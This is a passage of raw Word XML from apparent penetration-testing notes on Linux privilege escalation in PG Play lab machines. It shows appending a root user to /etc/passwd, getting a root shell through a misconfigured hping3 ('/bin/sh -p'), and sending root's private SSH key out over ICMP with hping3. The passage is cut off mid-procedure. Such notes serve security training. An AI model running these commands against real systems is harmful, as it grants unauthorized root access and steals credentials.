    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then it will give you an option to specify what to append, and then you copy and paste it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL + C</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to stop appending other lines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can confirm this by checking the last line of /etc/passwd file. After that, simply switch user to newly added user with the password whose hash we added and get root on the box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail -n 1 /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now login as that new user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su groot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password is "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sm4bvkdbrzqp" w:id="264"/>
      <w:bookmarkEnd w:id="264"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 (/usr/bin/hping3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you run sudo -l and see this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="928"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(root) NOPASSWD: /usr/sbin/hping3 --icmp *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ECF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it was just hping3 without the --icmp tag, then we would have used GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sete758z32p2" w:id="265"/>
      <w:bookmarkEnd w:id="265"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the SUID bit for /usr/sbin/hping3 is also set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId651">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But basically what they did was:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/hping3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001ED9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also try adding "sudo" to the start if the attack vector doesn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="618"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you are in the root shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first two steps can also be equivalently expressed as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/sbin/hping3 --icmp $(/bin/sh -p)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ajvci0brfvul" w:id="266"/>
      <w:bookmarkEnd w:id="266"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the SUID bit for /usr/sbin/hping3 is NOT set:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId652">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ICMP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hping3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root, but unlike the BBSCute box, we don't have SUID bit set for hping3. So, we can't do that simple attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Instead, we can actually use the hping functionality. hping3 is a tool in kali linux, it does what ping does, plus it also has additional functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using hping3, we can send contents of a file over ICMP in chunks, and have another ICMP listener going to catch the contents of the file. For this, we can try reading the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">private SSH key for root user. But theoretically, you can do this with any file too </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to reproduce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, check to see if id_rsa is within /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open a second terminal and ssh as Fox (compromised user), now we are running both sessions on same 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your second terminal set up a listener session</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hping3 --icmp 127.0.0.1 --listen signature --safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--listen signature</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : HPING3 listen mode, using this option hping3 waits for packet that contain signature and dump from signature end to packet's end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5321300" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId653"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53213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1EEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now go to your first terminal where first established ssh session as fox is</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001EF0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1416"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo /usr/sbin/hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
